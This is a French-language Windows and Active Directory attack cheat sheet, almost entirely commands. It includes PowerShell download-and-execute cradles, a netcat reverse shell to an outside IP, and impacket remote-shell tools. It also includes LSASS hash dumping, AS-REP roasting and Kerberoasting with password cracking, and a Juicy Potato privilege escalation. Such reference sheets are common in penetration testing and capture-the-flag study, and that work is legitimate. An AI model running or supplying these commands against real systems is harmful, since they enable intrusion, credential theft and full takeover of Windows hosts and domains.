
Cheat sheet – Windows
Cheat sheet – Windows
Commande windows:
- Télécharger puis exécuter un fichier: powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://[IP]/shell.ps1\");
- Télécharger un fichier: "wget http://[IP]/[fichier] -outfile [fichier]"
Ou alors: (new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','C:\Users\Public\shell.exe') - Historique Powershell: type C:\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Information systeme: systeminfo
- Lister les infos d'un user: net user [user]
- Lister quel groupe / user ont accès au fichier: icacls [fichier]:
Partage Samba:
- Lister tout les partages en anonymous: smbclient -N -L \\\\[IP]\\
- Lister tout les partages et les droits associés: smbmap -H [ip]
- Aller dans un partage: smbclient -N \\\\[IP]\\[nom_du_partage]
- Énumération des services windows: enum4liux [IP CIBLE]
Connexion a Windows Management (port 5985 par défaut) :
- evil-winrm -i [IP] -u [USER]
Utilisation du service RPC :
- Connexion au serveur: rpcclient -U "[USER]" [IP]
- Lister les users: enumdomusers
- Informations sur un user: queryuser [user]
- Transformer le format "enumdomusers" en une liste de user: cat user.txt | tr -d '[]' | cut -d ' ' -f1 | cut -c6-
- Lister les groupes: enumdomgroups
- Lister les groupe du domaine: enumalsgroups domain
- Lister les groupe par défault: enumalsgroups builtin
- Lister les SID présent dans un groupe : queryaliasmem domain [RID]
- Trouver le nom d'un utilisateur via son SID: lookupsids [SID]
- lister les partages NFS: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP]
Utilisation de impacket :
- shell via un partage samba : psexec.py [user]@[IP]
- shell via un partage samba en écriture: smbexec.py [user]@[IP]
- shell via Windows Management Instrumentation: wmiexec.py [user]@[IP]
- commande via le Planificateur de tâches: atexec.py [user]@[IP] [commande]
Bloodhound-python :
- sudo neo4j start --> démare neo4j
- bloodhound --no-sandbox --> ouvre bloodhound
- bloodhound-python -d [domain] -u [user] -p [password] -gc [name.domain] -c all -ns [IP] --> récupère les fichiers
- Find Principles with DCSync Rights. --> propose un schéma avec les objets principaux
- Shortest Paths to High value Targets --> propose un schéma avec plus de détail
Post énumération (script) :
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
Reverse shell :
-
- powershell iex(new-object net.webclient).downloadstring('http://[IP]/shell.ps1')
- Télécharger shell.ps1
récupérer les hash du processus LSASS:
- crackmapexec smb 192.168.1.105 -u '[user]' -p '[password]' --lsa
Attaque sur Kerberos:
ASREPRoast:
ASREPRoast est une technique qui permet de récupérer le mot de passe Kerberos d'un utilisateur en brutforcant son TGT lorsque que la pré-authentification est désactivé:
récupération du hash d'un compte:
GetNPUsers.py [domaine]/[user] -request -no-pass -dc-ip [IP]
Liste des users
GetNPUsers.py [domaine]/ -dc-ip [IP] -request
récupération d'un hash avec une wordlist de user:
GetNPUsers.py [domaine]/ -usersfile [wordlist user] -request -no-pass -dc-ip [IP]
Bruteforce du hash:
john [hash file] -wordlist=rockyou.txt
Kerberoasting:
Kerberoasting est une technique pour récupérer le mot de passe d'un compte de service en bruteforcant le TGS fournis pour ce service
récupération du hash:
GetUserSPNs.py -request -dc-ip [ip] [FQDN]/[user]
Bruteforce du hash:
john [hash file] -wordlist=rockyou.txt
Juicy Potato:
Dans sa configuration par défaut, Microsoft Windows Serveur a une vulnérabilité critique qui peut permettre l'élévation de privilèges.
Cette vulnérabilité s'appelle Juicy Potato.
Les versions de Windows Serveur suivantes sont affectées:
- Windows Serveur 2008 R2
- Windows Serveur 2012
- Windows Serveur 2012 R2
- Windows Serveur 2016
Méthode:
Uploader le .exe : dowload
créer un .bat reverse shell:
echo START C:\inetpub\wwwroot\wordpress\wp-content\nc.exe 10.10.14.69 1111 -e cmd.exe > reverse_shell.bat
Puis l'exécuter avec Juicy Potato
PS.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\reverse_shell.bat -l 1337